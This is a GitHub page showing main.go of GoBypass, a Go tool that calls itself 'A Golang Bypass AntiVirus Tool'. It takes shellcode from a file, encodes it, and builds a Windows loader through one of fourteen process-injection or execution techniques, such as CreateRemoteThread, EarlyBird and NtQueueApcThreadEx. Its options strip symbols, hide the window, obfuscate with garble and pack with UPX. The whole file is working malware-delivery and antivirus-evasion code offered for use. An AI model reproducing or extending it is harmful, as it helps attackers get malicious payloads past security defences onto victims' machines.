forked from afwu/GoBypass
-
Notifications
You must be signed in to change notification settings - Fork 0
/
main.go
126 lines (121 loc) · 3.77 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
package main
import (
"flag"
"fmt"
"github.com/EmYiQing/GoBypass/build"
"github.com/EmYiQing/GoBypass/encode"
"github.com/EmYiQing/GoBypass/log"
"github.com/EmYiQing/GoBypass/parser"
"github.com/EmYiQing/GoBypass/tool"
"strings"
)
const (
CreateFiber = "CreateFiber"
CreateProcess = "CreateProcess"
CreateRemoteThread = "CreateRemoteThread"
CreateRemoteThreadNative = "CreateRemoteThreadNative"
CreateThread = "CreateThread"
CreateThreadNative = "CreateThreadNative"
CryptProtectMemory = "CryptProtectMemory"
CryptUnprotectMemory = "CryptUnprotectMemory"
EarlyBird = "EarlyBird"
EtwpCreateEtwThread = "EtwpCreateEtwThread"
HeapAlloc = "HeapAlloc"
NtQueueApcThreadEx = "NtQueueApcThreadEx"
RtlCreateUserThread = "RtlCreateUserThread"
UuidFromStringA = "UuidFromStringA"
)
func main() {
printLogo()
var (
module string
shellcode string
ldflags bool
race bool
hide bool
upx bool
garble bool
help bool
)
flag.StringVar(&module, "m", "", "")
flag.BoolVar(&ldflags, "d", false, "")
flag.BoolVar(&race, "r", false, "")
flag.BoolVar(&hide, "w", false, "")
flag.BoolVar(&upx, "u", false, "")
flag.BoolVar(&garble, "g", false, "")
flag.StringVar(&shellcode, "s", "shellcode.txt", "")
flag.BoolVar(&help, "h", false, "")
flag.Parse()
if help {
printHelpInfo()
return
}
shellcode = parser.ParseShellCode(shellcode)
shellcode = encode.Encode(shellcode)
if strings.TrimSpace(module) == "" {
log.Error("module is null")
log.Info("see help: go run main.go -h")
return
}
if module != CreateFiber &&
module != CreateProcess &&
module != CreateRemoteThread &&
module != CreateRemoteThreadNative &&
module != CreateThread &&
module != CreateThreadNative &&
module != CryptProtectMemory &&
module != CryptUnprotectMemory &&
module != EarlyBird &&
module != EtwpCreateEtwThread &&
module != HeapAlloc &&
module != NtQueueApcThreadEx &&
module != RtlCreateUserThread &&
module != UuidFromStringA {
log.Error("error module")
log.Info("see help: go run main.go -h")
return
}
code := parser.GetFinalCode(module, shellcode)
if garble {
build.Garble(code, ldflags, hide, race)
} else {
build.Build(code, ldflags, hide, race)
}
if upx {
tool.StartUpx()
}
}
func printLogo() {
fmt.Println("__________ \n\\" +
"______ \\___.__.___________ ______ ______\n | | _< " +
"| |\\____ \\__ \\ / ___// ___/\n | | \\\\___ || |_" +
"> > __ \\_\\___ \\ \\___ \\ \n |______ // ____|| __(____ /" +
"____ >____ >\n \\/ \\/ |__| \\/ \\/ " +
" \\/ ")
}
func printHelpInfo() {
fmt.Println("A Golang Bypass AntiVirus Tool (coded by 4ra1n)")
fmt.Println("\nusage: go run main.go -m [MODULE] -u -g")
fmt.Println("\t-m : use module (default: null)")
fmt.Println("\t-d : delete symbol table and debug info (default: false)")
fmt.Println("\t-r : use race detector (default: false)")
fmt.Println("\t-w : hide windows gui (default: false)")
fmt.Println("\t-u : use upx (default: false)")
fmt.Println("\t-g : build by garble (default: false)")
fmt.Println("\t-s : shellcode (default: shellcode.txt)")
fmt.Println("\nmodules:")
fmt.Println("\t", CreateFiber)
fmt.Println("\t", CreateProcess)
fmt.Println("\t", CreateRemoteThread)
fmt.Println("\t", CreateRemoteThreadNative)
fmt.Println("\t", CreateThread)
fmt.Println("\t", CreateThreadNative)
fmt.Println("\t", CryptProtectMemory)
fmt.Println("\t", CryptUnprotectMemory)
fmt.Println("\t", EarlyBird)
fmt.Println("\t", EtwpCreateEtwThread)
fmt.Println("\t", HeapAlloc)
fmt.Println("\t", NtQueueApcThreadEx)
fmt.Println("\t", RtlCreateUserThread)
fmt.Println("\t", UuidFromStringA)
}